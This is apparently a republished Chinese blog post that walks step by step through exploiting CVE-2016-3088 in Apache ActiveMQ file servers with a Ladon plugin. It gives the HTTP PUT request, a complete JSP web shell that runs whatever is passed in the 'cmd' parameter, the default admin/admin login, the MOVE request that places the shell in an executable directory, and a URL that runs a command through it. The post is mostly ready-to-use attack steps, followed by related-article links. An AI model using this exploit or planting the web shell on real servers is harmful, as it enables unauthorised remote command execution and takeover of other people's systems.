Ladon插件CVE-2016-3088 ActiveMQ GetShell Exploit

Posted K8哥哥

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Ladon插件CVE-2016-3088 ActiveMQ GetShell Exploit相关的知识,希望对你有一定的参考价值。

前言

使用Exp生成器生成Ladon插件实战,CVE-2016-3088 ActiveMQ GetShell

0x000 漏洞信息

漏洞编号: CVE-2016-3088

漏洞原理: ActiveMQ 中的 FileServer 服务允许用户通过 PUT/MOVE方法上传文件到指定目录

影响版本: Apache ActiveMQ 5.0.0 – 5.13.2

0x001 获取路径

PUT /fileserver/%20/%20

技术图片

0x002 上传shell

上传和移动文件需登陆,默认帐密admin/admin,将以下代码双引号进行转义(原本是转义好的被github过滤了)

PUT

AddUrl: /fileserver/cmd.jsp

PUTData: <%@ page import="java.io.*"%><%out.print("Hello");String strcmd = request.getParameter("cmd");String line =null;Process p=Runtime.getRuntime().exec(strcmd);InputStream is = p.getInputStream();BufferedReader br = new BufferedReader(new InputStreamReader(is));while((line =br.readLine())!=null){out.print(line+"");}%>

Authorization: admin:admin

技术图片

0x003 移动shell

根目录和fileserver均不解析JSP文件,好在admin和api目录可以解析

MOVE

AddUrl: /fileserver/cmd.jsp

Destination: file://C:/Users/null/Desktop/apache-activemq-5.9.0/webapps/admin/cmd.jsp

技术图片

0x004 Cscan调用

技术图片

0x005 连接shell

访问http://192.168.1.26:8161/admin/shell.jsp?cmd=whoami

技术图片

0x006 视频教程

Video1: K8Cscan Apache ActiveMQ GetShell CVE-2016-3088

Video2: WhatCMS指纹识别内网ActiveMQ&GetShell
















以上是关于Ladon插件CVE-2016-3088 ActiveMQ GetShell Exploit的主要内容,如果未能解决你的问题,请参考以下文章

Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)

漏洞复现 - ActiveMQ任意文件写入漏洞(CVE-2016-3088)

Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现

Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)分析

Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)【原理扫描】 求救这个漏洞要怎么修复?

Ladon插件实战 Weblogic CVE-2018-2894